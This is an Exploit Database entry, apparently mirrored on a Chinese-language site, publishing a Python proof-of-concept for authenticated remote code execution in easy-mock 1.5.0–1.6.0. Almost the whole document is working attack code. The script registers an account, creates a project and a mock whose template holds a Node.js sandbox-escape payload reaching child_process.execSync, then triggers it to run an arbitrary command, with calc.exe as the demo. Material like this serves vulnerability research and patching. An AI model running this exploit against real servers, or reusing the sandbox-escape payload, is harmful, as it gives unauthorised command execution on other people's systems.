easy-mock 1.6.0 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 18 阅读

• 作者： LionTree
  日期： 2021-08-13
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50194/

• # Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
  # Date: 12/08/2021
  # Exploit Author: LionTree
  # Vendor Homepage: https://github.com/easy-mock
  # Software Link: https://github.com/easy-mock/easy-mock
  # Version: 1.5.0-1.6.0
  # Tested on: windows 10(node v8.17.0)
  
  import requests
  import json
  import random
  import string
  
  target = 'http://127.0.0.1:7300'
  username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
  password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
  print(username)
  print(password)
  # can't see the result of command
  cmd = 'calc.exe'
  
  # register
  url = target + "/api/u/register"
  cookies = {"SSO_LANG_V2": "EN"}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
  json_data={"name": username, "password": password}
  requests.post(url, headers=headers, cookies=cookies, json=json_data)
  
  # login
  url = target + "/api/u/login"
  cookies = {"SSO_LANG_V2": "EN"}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
  json_data={"name": username, "password": password}
  req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
  login = json.loads(req)
  token = login['data']['token']
  
  # create project
  url = target + "/api/project/create"
  cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
  json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
  requests.post(url, headers=headers, cookies=cookies, json=json_data)
  
  # get project_id
  url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
  cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
  req = requests.get(url, headers=headers, cookies=cookies).text
  projects = json.loads(req)
  project_id = projects['data'][0]['_id']
  
  # create mock
  url = target + "/api/mock/create"
  cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
  json_data={"description": "poc", "method": "get", "mode": "{\n'foo': 'Syntax Demo',\n'name': function() {\nreturn (function() {\nTypeError.prototype.get_process = f => f.constructor(\"return process\")();\ntry {\nObject.preventExtensions(Buffer.from(\"\")).a = 1;\n} catch (e) {\nreturn e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n}\n})();\n}\n}", "project_id": project_id, "url": "/" + username}
  requests.post(url, headers=headers, cookies=cookies, json=json_data)
  
  # preview mock
  url = target + "/mock/{}/{}/{}".format(project_id,username,username)
  cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
  headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
  requests.get(url, headers=headers, cookies=cookies)